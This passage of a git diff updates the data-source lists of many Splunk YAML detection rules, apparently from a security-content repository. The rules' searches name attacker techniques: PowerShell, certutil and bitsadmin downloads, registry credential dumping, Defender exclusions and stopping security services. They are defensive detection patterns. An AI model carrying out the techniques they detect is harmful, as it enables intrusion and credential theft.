   as lastTime FROM datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.dest
diff --git a/detections/deprecated/suspicious_powershell_command_line_arguments.yml b/detections/deprecated/suspicious_powershell_command_line_arguments.yml
index 5a791c4a41..572bb38339 100644
--- a/detections/deprecated/suspicious_powershell_command_line_arguments.yml
+++ b/detections/deprecated/suspicious_powershell_command_line_arguments.yml
@@ -13,7 +13,7 @@ description: This search looks for PowerShell processes started with a base64 en
   passes an encoded script to be run on the command-line. Deprecated because almost
   the same as Malicious PowerShell Process - Encoded Command
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe
diff --git a/detections/deprecated/suspicious_rundll32_rename.yml b/detections/deprecated/suspicious_rundll32_rename.yml
index 6abf25019f..015dddaa02 100644
--- a/detections/deprecated/suspicious_rundll32_rename.yml
+++ b/detections/deprecated/suspicious_rundll32_rename.yml
@@ -12,7 +12,7 @@ description: The following hunting analytic identifies renamed instances of rund
   name from the PE meta data. Expand the query as needed by looking for specific command
   line arguments outlined in other analytics.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.original_file_name=RUNDLL32.exe
   AND Processes.process_name!=rundll32.exe by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/deprecated/suspicious_writes_to_system_volume_information.yml b/detections/deprecated/suspicious_writes_to_system_volume_information.yml
index 32a61fd9fa..c3ea9c5edf 100644
--- a/detections/deprecated/suspicious_writes_to_system_volume_information.yml
+++ b/detections/deprecated/suspicious_writes_to_system_volume_information.yml
@@ -8,7 +8,7 @@ type: Hunting
 description: This search detects writes to the 'System Volume Information' folder
   by something other than the System process.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '(`sysmon` OR tag=process) EventCode=11 process_id!=4 file_path=*System\ Volume
   Information* | stats count min(_time) as firstTime max(_time) as lastTime by dest,
   Image, file_path | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
diff --git a/detections/deprecated/uncommon_processes_on_endpoint.yml b/detections/deprecated/uncommon_processes_on_endpoint.yml
index 3332774ef7..18a30cc4de 100644
--- a/detections/deprecated/uncommon_processes_on_endpoint.yml
+++ b/detections/deprecated/uncommon_processes_on_endpoint.yml
@@ -8,7 +8,7 @@ type: Hunting
 description: This search looks for applications on the endpoint that you have marked
   as uncommon.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process
   Processes.process_name | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
diff --git a/detections/deprecated/unsigned_image_loaded_by_lsass.yml b/detections/deprecated/unsigned_image_loaded_by_lsass.yml
index 51423fd51a..5a926b6aff 100644
--- a/detections/deprecated/unsigned_image_loaded_by_lsass.yml
+++ b/detections/deprecated/unsigned_image_loaded_by_lsass.yml
@@ -8,7 +8,7 @@ type: TTP
 description: This search detects loading of unsigned images by LSASS. Deprecated because
   too noisy.
 data_source:
-- Sysmon Event ID 7
+- Sysmon EventID 7
 search: '`sysmon` EventID=7 Image=*lsass.exe Signed=false | stats count min(_time)
   as firstTime max(_time) as lastTime by dest, Image, ImageLoaded, Signed, SHA1
    | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
diff --git a/detections/deprecated/windows_connhost_exe_started_forcefully.yml b/detections/deprecated/windows_connhost_exe_started_forcefully.yml
index 4eb62ad733..173ee8ff8a 100644
--- a/detections/deprecated/windows_connhost_exe_started_forcefully.yml
+++ b/detections/deprecated/windows_connhost_exe_started_forcefully.yml
@@ -11,7 +11,7 @@ description: 'The search looks for the Console Window Host process (connhost.exe
   seen in the windows 10 client of attack_range_local. After further testing we realized
   this is not specific to Ryuk. '
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process="*C:\\Windows\\system32\\conhost.exe*
   0xffffffff *-ForceV1*" by Processes.user Processes.process_name Processes.process
diff --git a/detections/deprecated/windows_dll_search_order_hijacking_hunt.yml b/detections/deprecated/windows_dll_search_order_hijacking_hunt.yml
index 330795f059..d81b9ab21e 100644
--- a/detections/deprecated/windows_dll_search_order_hijacking_hunt.yml
+++ b/detections/deprecated/windows_dll_search_order_hijacking_hunt.yml
@@ -17,6 +17,9 @@ description: The following hunting analytic is an experimental query built again
   the Hijacklibs.net project.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
+- Windows Event Log Security 4688
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime values(Processes.process_name) as process_name from datamodel=Endpoint.Processes
   where Processes.dest!=unknown Processes.user!=unknown NOT (Processes.process_path
diff --git a/detections/deprecated/windows_hosts_file_modification.yml b/detections/deprecated/windows_hosts_file_modification.yml
index 49c1c72255..ffa7d52961 100644
--- a/detections/deprecated/windows_hosts_file_modification.yml
+++ b/detections/deprecated/windows_hosts_file_modification.yml
@@ -8,7 +8,7 @@ type: TTP
 description: The search looks for modifications to the hosts file on all Windows endpoints
   across your environment.
 data_source:
-- Sysmon Event ID 11
+- Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Filesystem  by Filesystem.file_name Filesystem.file_path
   Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)`
diff --git a/detections/endpoint/7zip_commandline_to_smb_share_path.yml b/detections/endpoint/7zip_commandline_to_smb_share_path.yml
index 76c046406f..b065f64bc2 100644
--- a/detections/endpoint/7zip_commandline_to_smb_share_path.yml
+++ b/detections/endpoint/7zip_commandline_to_smb_share_path.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of 7z or 7za processes
   sensitive information and potentially aiding further attacks.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name ="7z.exe"
   OR Processes.process_name = "7za.exe" OR Processes.original_file_name = "7z.exe"
diff --git a/detections/endpoint/account_discovery_with_net_app.yml b/detections/endpoint/account_discovery_with_net_app.yml
index 2f4a8fd313..9c6aa7d7a1 100644
--- a/detections/endpoint/account_discovery_with_net_app.yml
+++ b/detections/endpoint/account_discovery_with_net_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects potential account discovery activiti
   a significant security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.parent_process) as parent_process values(Processes.process_id)
   as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/active_setup_registry_autostart.yml b/detections/endpoint/active_setup_registry_autostart.yml
index 203813afd5..35414f35ac 100644
--- a/detections/endpoint/active_setup_registry_autostart.yml
+++ b/detections/endpoint/active_setup_registry_autostart.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious modifications to the Acti
   code upon system startup, potentially leading to further system compromise and unauthorized
   access.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_value_name= "StubPath" Registry.registry_path = "*\\SOFTWARE\\Microsoft\\Active
diff --git a/detections/endpoint/add_defaultuser_and_password_in_registry.yml b/detections/endpoint/add_defaultuser_and_password_in_registry.yml
index e84b56e1ef..549e04b2db 100644
--- a/detections/endpoint/add_defaultuser_and_password_in_registry.yml
+++ b/detections/endpoint/add_defaultuser_and_password_in_registry.yml
@@ -15,8 +15,7 @@ description: The following analytic detects suspicious registry modifications th
   to maintain persistence and further encrypt the network, leading to significant
   data loss and operational disruption.
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 13
+- Sysmon EventID 13 
 - Sysmon EventID 14
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*"
diff --git a/detections/endpoint/add_or_set_windows_defender_exclusion.yml b/detections/endpoint/add_or_set_windows_defender_exclusion.yml
index 693246971c..82a65ac702 100644
--- a/detections/endpoint/add_or_set_windows_defender_exclusion.yml
+++ b/detections/endpoint/add_or_set_windows_defender_exclusion.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of commands to add or set ex
   interference from Windows Defender.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*Add-MpPreference
   *" OR Processes.process = "*Set-MpPreference *") AND Processes.process="*-exclusion*"
diff --git a/detections/endpoint/allow_file_and_printing_sharing_in_firewall.yml b/detections/endpoint/allow_file_and_printing_sharing_in_firewall.yml
index 1a2a11b37c..5a2ac8f40d 100644
--- a/detections/endpoint/allow_file_and_printing_sharing_in_firewall.yml
+++ b/detections/endpoint/allow_file_and_printing_sharing_in_firewall.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the modification of firewall setting
   attack.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process=
   "*firewall*" Processes.process= "*group=\"File and Printer Sharing\"*"  Processes.process="*enable=Yes*"
diff --git a/detections/endpoint/allow_inbound_traffic_by_firewall_rule_registry.yml b/detections/endpoint/allow_inbound_traffic_by_firewall_rule_registry.yml
index ae793efaed..7ad7cf43f9 100644
--- a/detections/endpoint/allow_inbound_traffic_by_firewall_rule_registry.yml
+++ b/detections/endpoint/allow_inbound_traffic_by_firewall_rule_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious modifications to firewall
   leading to further exploitation, data exfiltration, or lateral movement within the
   network.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\*"
diff --git a/detections/endpoint/allow_network_discovery_in_firewall.yml b/detections/endpoint/allow_network_discovery_in_firewall.yml
index 07192c9714..e56d04a430 100644
--- a/detections/endpoint/allow_network_discovery_in_firewall.yml
+++ b/detections/endpoint/allow_network_discovery_in_firewall.yml
@@ -15,6 +15,8 @@ description: The following analytic detects a suspicious modification to the fir
   ransomware attack.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process=
   "*firewall*" Processes.process= "*group=\"Network Discovery\"*"  Processes.process="*enable*"
diff --git a/detections/endpoint/allow_operation_with_consent_admin.yml b/detections/endpoint/allow_operation_with_consent_admin.yml
index 1d37f3adf4..02a978d199 100644
--- a/detections/endpoint/allow_operation_with_consent_admin.yml
+++ b/detections/endpoint/allow_operation_with_consent_admin.yml
@@ -15,7 +15,7 @@ description: The following analytic detects a registry modification that allows
   administrative access and control over the compromised machine, posing a severe
   security risk.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\Microsoft\\Windows\\CurrentVersion\\Policies\\System*"
diff --git a/detections/endpoint/anomalous_usage_of_7zip.yml b/detections/endpoint/anomalous_usage_of_7zip.yml
index 73420cfda5..37ed56590f 100644
--- a/detections/endpoint/anomalous_usage_of_7zip.yml
+++ b/detections/endpoint/anomalous_usage_of_7zip.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of 7z.exe, a 7-Zip uti
   sensitive information and potentially leading to further system exploitation.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("rundll32.exe", "dllhost.exe") Processes.process_name=*7z* by Processes.dest
diff --git a/detections/endpoint/any_powershell_downloadfile.yml b/detections/endpoint/any_powershell_downloadfile.yml
index 8731471376..5455e24e79 100644
--- a/detections/endpoint/any_powershell_downloadfile.yml
+++ b/detections/endpoint/any_powershell_downloadfile.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of PowerShell's `DownloadFil
   context.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*DownloadFile*
   by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/any_powershell_downloadstring.yml b/detections/endpoint/any_powershell_downloadstring.yml
index f811a1c48b..7b8a99521f 100644
--- a/detections/endpoint/any_powershell_downloadstring.yml
+++ b/detections/endpoint/any_powershell_downloadstring.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of PowerShell's `DownloadStr
   affected system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*.DownloadString*  by
   Processes.dest Processes.user Processes.parent_process Processes.parent_process_name
diff --git a/detections/endpoint/attacker_tools_on_endpoint.yml b/detections/endpoint/attacker_tools_on_endpoint.yml
index d5be08b6a2..8a7e564e20 100644
--- a/detections/endpoint/attacker_tools_on_endpoint.yml
+++ b/detections/endpoint/attacker_tools_on_endpoint.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects the execution of tools commonly exploited by cybercriminals, such as those used for unauthorized access, network scanning, or data exfiltration. It leverages process activity data from Endpoint Detection and Response (EDR) agents, focusing on known attacker tool names. This activity is significant because it serves as an early warning system for potential security incidents, enabling prompt response. If confirmed malicious, this activity could lead to unauthorized access, data theft, or further network compromise, posing a severe threat to the organization's security infrastructure.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime values(Processes.process) as process values(Processes.parent_process)
   as parent_process from datamodel=Endpoint.Processes where Processes.dest!=unknown
diff --git a/detections/endpoint/attempt_to_add_certificate_to_untrusted_store.yml b/detections/endpoint/attempt_to_add_certificate_to_untrusted_store.yml
index be0059ec9e..4b9f66efaa 100644
--- a/detections/endpoint/attempt_to_add_certificate_to_untrusted_store.yml
+++ b/detections/endpoint/attempt_to_add_certificate_to_untrusted_store.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects attempts to add a certificate to the untrusted certificate store using the 'certutil -addstore' command. It leverages process activity and command-line arguments from Endpoint Detection and Response (EDR) logs mapped to the Splunk `Processes` data model. This activity is significant as it may indicate an attacker trying to disable security tools to gain unauthorized access. If confirmed malicious, this could lead to the compromise of system security, allowing attackers to bypass defenses and potentially escalate privileges or persist in the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process)
   as process max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil`
   (Processes.process=*-addstore*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/attempt_to_stop_security_service.yml b/detections/endpoint/attempt_to_stop_security_service.yml
index d1b6bad955..6a3c54360b 100644
--- a/detections/endpoint/attempt_to_stop_security_service.yml
+++ b/detections/endpoint/attempt_to_stop_security_service.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects attempts to stop security-related services on an endpoint, which may indicate malicious activity. It leverages data from Endpoint Detection and Response (EDR) agents, specifically searching for processes involving the "sc.exe" command with the "stop" parameter. This activity is significant because disabling security services can undermine the organization's security posture, potentially leading to unauthorized access, data exfiltration, or further attacks like malware installation or privilege escalation. If confirmed malicious, this behavior could compromise the endpoint and the entire network, necessitating immediate investigation and response.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where `process_net` OR  Processes.process_name = sc.exe Processes.process="* stop
diff --git a/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml b/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml
index 66c040aee5..0ef5debd5a 100644
--- a/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml
+++ b/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of reg.exe with parame
   the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=reg*
   OR Processes.process_name=cmd* Processes.process=*save* (Processes.process=*HKEY_LOCAL_MACHINE\\Security*
diff --git a/detections/endpoint/auto_admin_logon_registry_entry.yml b/detections/endpoint/auto_admin_logon_registry_entry.yml
index c11c8a7094..45f2adea93 100644
--- a/detections/endpoint/auto_admin_logon_registry_entry.yml
+++ b/detections/endpoint/auto_admin_logon_registry_entry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects a suspicious registry modification t
   their operations, potentially leading to widespread network encryption and data
   loss.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*"
diff --git a/detections/endpoint/batch_file_write_to_system32.yml b/detections/endpoint/batch_file_write_to_system32.yml
index b7907de2c7..6f0cad7956 100644
--- a/detections/endpoint/batch_file_write_to_system32.yml
+++ b/detections/endpoint/batch_file_write_to_system32.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the creation of a batch file (.bat)
   to execute arbitrary commands with elevated privileges, potentially compromising
   the entire system.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1 AND Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name=* by _time span=1h Processes.process_guid Processes.process_name
   Processes.dest Processes.user | `drop_dm_object_name(Processes)` | join process_guid
diff --git a/detections/endpoint/bcdedit_command_back_to_normal_mode_boot.yml b/detections/endpoint/bcdedit_command_back_to_normal_mode_boot.yml
index e6e58b0986..adaef8948f 100644
--- a/detections/endpoint/bcdedit_command_back_to_normal_mode_boot.yml
+++ b/detections/endpoint/bcdedit_command_back_to_normal_mode_boot.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a suspicious `bcded
   leading to further system compromise and data encryption.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe
   Processes.process="*/deletevalue*" Processes.process="*{current}*"  Processes.process="*safeboot*"
diff --git a/detections/endpoint/bcdedit_failure_recovery_modification.yml b/detections/endpoint/bcdedit_failure_recovery_modification.yml
index fe7dbc22e9..d49abaada7 100644
--- a/detections/endpoint/bcdedit_failure_recovery_modification.yml
+++ b/detections/endpoint/bcdedit_failure_recovery_modification.yml
@@ -15,6 +15,8 @@ description: The following analytic detects modifications to the Windows error r
   complicate remediation.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe
   Processes.process="*recoveryenabled*" (Processes.process="* no*") by Processes.process_name
diff --git a/detections/endpoint/bits_job_persistence.yml b/detections/endpoint/bits_job_persistence.yml
index e67abbaf5b..36a409ddd5 100644
--- a/detections/endpoint/bits_job_persistence.yml
+++ b/detections/endpoint/bits_job_persistence.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `bitsadmin.exe` to schedu
   further investigation and potential remediation.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process
   IN (*create*, *addfile*, *setnotifyflags*, *setnotifycmdline*, *setminretrydelay*,
diff --git a/detections/endpoint/bitsadmin_download_file.yml b/detections/endpoint/bitsadmin_download_file.yml
index 384bdf2eb3..8846f32618 100644
--- a/detections/endpoint/bitsadmin_download_file.yml
+++ b/detections/endpoint/bitsadmin_download_file.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the use of `bitsadmin.exe` with the
   associated artifacts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process
   IN ("*transfer*", "*addfile*") by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml b/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml
index f7617cb6e4..01481cc3e8 100644
--- a/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml
+++ b/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of certutil.exe to download
   and unauthorized data access.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*urlcache*
   Processes.process=*split*) OR Processes.process=*urlcache* by Processes.dest Processes.user
diff --git a/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml b/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml
index ab76a73504..8e754fd5f8 100644
--- a/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml
+++ b/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the use of `certutil.exe` to downlo
   compromise of the system.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*verifyctl*
   Processes.process=*split*) OR Processes.process=*verifyctl* by Processes.dest Processes.user
diff --git a/detections/endpoint/certutil_exe_certificate_extraction.yml b/detections/endpoint/certutil_exe_certificate_extraction.yml
index a546826f0b..c8dde3208e 100644
--- a/detections/endpoint/certutil_exe_certificate_extraction.yml
+++ b/detections/endpoint/certutil_exe_certificate_extraction.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of certutil.exe with argu
   escalation within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=certutil.exe
   Processes.process = "*-exportPFX*" by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/certutil_with_decode_argument.yml b/detections/endpoint/certutil_with_decode_argument.yml
index cdd65c8aa1..f4c25f7b0a 100644
--- a/detections/endpoint/certutil_with_decode_argument.yml
+++ b/detections/endpoint/certutil_with_decode_argument.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of CertUtil.exe with the 'de
   further system compromise, and potential data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_certutil` Processes.process=*decode*
   by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name
diff --git a/detections/endpoint/change_default_file_association.yml b/detections/endpoint/change_default_file_association.yml
index 4c9eae831c..7dd89984e1 100644
--- a/detections/endpoint/change_default_file_association.yml
+++ b/detections/endpoint/change_default_file_association.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious registry modifications th
   malicious, this technique can enable attackers to persist on the compromised host
   and execute further malicious commands, posing a severe threat to the environment.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count  min(_time) as firstTime
   max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path
diff --git a/detections/endpoint/change_to_safe_mode_with_network_config.yml b/detections/endpoint/change_to_safe_mode_with_network_config.yml
index cd7079ba17..ccf84c1fe2 100644
--- a/detections/endpoint/change_to_safe_mode_with_network_config.yml
+++ b/detections/endpoint/change_to_safe_mode_with_network_config.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a suspicious `bcded
   and continue their malicious activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe
   Processes.process="*/set*" Processes.process="*{current}*"  Processes.process="*safeboot*"
diff --git a/detections/endpoint/chcp_command_execution.yml b/detections/endpoint/chcp_command_execution.yml
index f4b3a5c1e9..fb247f8443 100644
--- a/detections/endpoint/chcp_command_execution.yml
+++ b/detections/endpoint/chcp_command_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the chcp.exe applic
   system compromise and data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=chcp.com
   Processes.parent_process_name = cmd.exe (Processes.parent_process=*/c* OR Processes.parent_process=*/k*)
diff --git a/detections/endpoint/check_elevated_cmd_using_whoami.yml b/detections/endpoint/check_elevated_cmd_using_whoami.yml
index e2cfedcecb..f9d98c1330 100644
--- a/detections/endpoint/check_elevated_cmd_using_whoami.yml
+++ b/detections/endpoint/check_elevated_cmd_using_whoami.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the execution of the 'whoami' com
   leading to further privilege escalation or persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where  Processes.process = "*whoami*"
   Processes.process = "*/group*" Processes.process = "* find *" Processes.process
diff --git a/detections/endpoint/child_processes_of_spoolsv_exe.yml b/detections/endpoint/child_processes_of_spoolsv_exe.yml
index 2403887364..af335b10da 100644
--- a/detections/endpoint/child_processes_of_spoolsv_exe.yml
+++ b/detections/endpoint/child_processes_of_spoolsv_exe.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies child processes spawned by spools
   privileges, and potentially compromise the entire system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
   as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=spoolsv.exe
diff --git a/detections/endpoint/clear_unallocated_sector_using_cipher_app.yml b/detections/endpoint/clear_unallocated_sector_using_cipher_app.yml
index 90c1dd8e9a..e643ff1945 100644
--- a/detections/endpoint/clear_unallocated_sector_using_cipher_app.yml
+++ b/detections/endpoint/clear_unallocated_sector_using_cipher_app.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `cipher.exe` with t
   critical data, thereby complicating the investigation and remediation process.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "cipher.exe"
   Processes.process = "*/w:*" by Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/clop_common_exec_parameter.yml b/detections/endpoint/clop_common_exec_parameter.yml
index 197e374c96..f22c836b05 100644
--- a/detections/endpoint/clop_common_exec_parameter.yml
+++ b/detections/endpoint/clop_common_exec_parameter.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of CLOP ransomware
   highlighting the need for immediate investigation and response.
